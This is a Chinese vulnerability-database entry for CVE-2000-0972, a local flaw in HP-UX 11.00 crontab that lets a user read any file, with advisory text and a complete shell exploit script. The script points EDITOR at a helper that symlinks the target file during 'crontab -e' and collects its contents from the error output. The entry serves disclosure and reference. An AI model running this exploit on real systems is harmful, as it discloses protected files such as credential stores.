HP-UX crontab读取任意文件漏洞

HP-UX crontab读取任意文件漏洞

漏洞ID 1106047 漏洞类型 未知
发布时间 2000-10-20 更新时间 2005-05-02
图片[1]-HP-UX crontab读取任意文件漏洞-安全小百科CVE编号 CVE-2000-0972
图片[2]-HP-UX crontab读取任意文件漏洞-安全小百科CNNVD-ID CNNVD-200012-153
漏洞平台 HP-UX CVSS评分 2.1
|漏洞来源
https://www.exploit-db.com/exploits/20329
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200012-153
|漏洞详情
HP-UX11.00crontab版本存在漏洞。本地用户借助-e选项通过在crontab会话期间创建与目标文件的符号链接,退出会话,以及读取crontab生成的错误消息来读取任意文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/1845/info

crontab is a binary in the cron package of the HP-UX cron implementation which allows a user to create a file of scheduled commands. A vulnerabiltiy in crontab exists that allows a user to read any file on an HP-UX system. crontab as implemented with HP-UX is a access controlled binary. Users are permitted to run crontab only if they have an access entry in the crontab.allow file.

To create a crontab, a user must execute the command "crontab -e." Executing this command launches the vi editor, creates a file in the /tmp directory with the ownership delegated to the user running the command. While the file exists in /tmp, the owner of the file may spawn a shell from vi and create a symbolic link to any file on the system. After exiting the spawned shell, then quitting vi, an error message will return the contents of the previously symbolically linked file to the standard output of the user.


#!/bin/sh
#
#  HP-UX 11.00 crontab
#
#  Kyong-won,Cho
#
#             [email protected]
#
#  Usage : ./crontab.sh <distfile>
#
#

if [ -z "$1" ]
then

echo "Usage : $0 <distfile>"
exit

fi

cat << _EOF_ > /tmp/crontab_exp
#!/bin/sh

ln -sf $1 $1

_EOF_

chmod 755 /tmp/crontab_exp

EDITOR=/tmp/crontab_exp
export EDITOR

crontab -e 2> /tmp/crontab$$

grep -v "error on previous line" /tmp/crontab$$

rm -f /tmp/crontab_exp /tmp/crontab$$
|参考资料

来源:XF
名称:hp-crontab-read-files
链接:http://xforce.iss.net/static/5410.php
来源:BUGTRAQ
名称:20001020[Hackerslabbug_paper]HP-UXcrontabtemporaryfilesymboliclinkvulnerability
链接:http://archives.neohapsis.com/archives/bugtraq/2000-10/0317.html

相关推荐: DansGuardian被拒绝URL跨站脚本漏洞

DansGuardian被拒绝URL跨站脚本漏洞 漏洞ID 1107530 漏洞类型 跨站脚本 发布时间 2003-10-22 更新时间 2003-12-31 CVE编号 CVE-2003-1506 CNNVD-ID CNNVD-200312-424 漏洞平台…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享